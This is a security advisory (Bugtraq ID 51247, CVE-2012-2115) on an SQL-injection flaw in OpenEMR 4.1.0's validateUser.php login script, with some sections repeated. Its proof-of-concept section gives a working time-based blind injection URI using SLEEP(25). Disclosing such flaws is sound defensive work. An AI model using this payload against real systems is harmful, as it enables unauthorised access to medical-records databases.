OpenEMR 'validateUser.php' SQL Injection Vulnerability
BID:51247
Info
OpenEMR 'validateUser.php' SQL Injection Vulnerability
| Bugtraq ID: | 51247 |
| Class: | Input Validation Error |
| CVE: |
CVE-2012-2115 |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 03 2012 12:00AM |
| Updated: | Mar 08 2015 04:04PM |
| Credit: | Mavituna Security |
| Vulnerable: |
OpenEMR OpenEMR 4.1 |
| Not Vulnerable: | |
Discussion
OpenEMR 'validateUser.php' SQL Injection Vulnerability
OpenEMR is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
OpenEMR 4.1.0 is vulnerable; other versions may also be affected.
OpenEMR is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
OpenEMR 4.1.0 is vulnerable; other versions may also be affected.
Exploit / POC
OpenEMR 'validateUser.php' SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/interface/login/validateUser.php?u='%2b(SELECT%201%20FROM%20(SELECT%20SLEEP(25))A)%2b'
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/interface/login/validateUser.php?u='%2b(SELECT%201%20FROM%20(SELECT%20SLEEP(25))A)%2b'
References
OpenEMR 'validateUser.php' SQL Injection Vulnerability
References:
References:
- Product Download Page (OpenEMR)
- SQL Injection Vulnerability in OpenEMR (Mavituna Security Ltd.)